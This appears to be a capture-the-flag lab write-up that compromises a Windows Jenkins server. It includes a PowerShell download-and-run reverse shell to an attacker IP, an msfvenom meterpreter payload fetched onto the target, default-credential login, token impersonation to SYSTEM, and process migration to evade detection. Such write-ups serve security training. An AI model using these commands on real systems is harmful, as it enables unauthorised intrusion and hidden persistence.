Alfred

March 19, 2024

Task 1: Initial Access

nmap -oN nmap-all 10.10.108.118 -p- -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-19 13:04 PST
Nmap scan report for 10.10.108.118
Host is up (0.25s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 304.02 seconds

First we when we visited the IIS website, we can see here the webpage

Then the second one that we visited is the jenkins login page which is located in port 8080 or http-proxy service

After several tries to login we discovered that the login credentials is default

admin:admin

Then this is the dashboard for the jenkins once you log in as an admin

After navigating to the dashboard now we can access the "project" which is a project that is named as project.

Then we will just click configure which is located in the left side of the page. After that scroll down to the bottom part which is the windows batch command or our payload will be placed...

powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.193.229:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.193.229 -Port 4444

After we applied and saved our changes to the project we will now click the "Build Now" button to build the project so that our payload will be executed.

We can see here in the console output the reverse shell payload is being processed by the server

And then we got the reverse connection from the server which leads to user bruce

Task 2: Switching Shells

Now we have to switch shell to have a better elevating privilege.

First we have to make a reverse_tcp payload using the msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.193.229 LPORT=4445 -f exe -o shell-name.exe

Then we need a listener and we will use the meterpreter for that

We will just upload the payload the same as before how we got the reverse shell connection

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.193.229:8000/shell-name.exe','shell-name.exe')"

Just click the build now again

Then payload is now being processed

After we downloaded the malicious exe or the reverse tcp exe. Now we have to get in the box another time using the reverse payload before.

So once again we just apply and save this.

Click the build now

As we get back into the box we can see our newly created malicious exe or the reverse tcp for our meterpreter. We just have to execute it

Start-Process "shell-name.exe"

.

After we execute the .exe file, now we got the reverse tcp in the meterpreter

First we have to use shell for us to get the normal terminal

Then use the command whoami /priv to view our privilege

After that we will exit from the shell and use the command load incognito

"Incognito allows us to impersonate user tokens. It was first integrated into Metasploit first, then to Meterpreter. In this recipe, we will be covering Incognito and use cases. Tokens are similar to web cookies." - From google

Use the list_tokens -g to view the availabe tokens that we can impersonate

Then just use impersonate_token command and the user that we desire, of course the first user that we will try is administrator

We got the NT authority\system

After that we will get rid of our process in the processes so that we can avoid getting detected

Now view the processes in the box

Just migrate into the services.exe process

When we use the PS command again, now we can't see the shell-name.exe process that we was on before.

Having the highest privilege user in the box will now be able to view the root.txt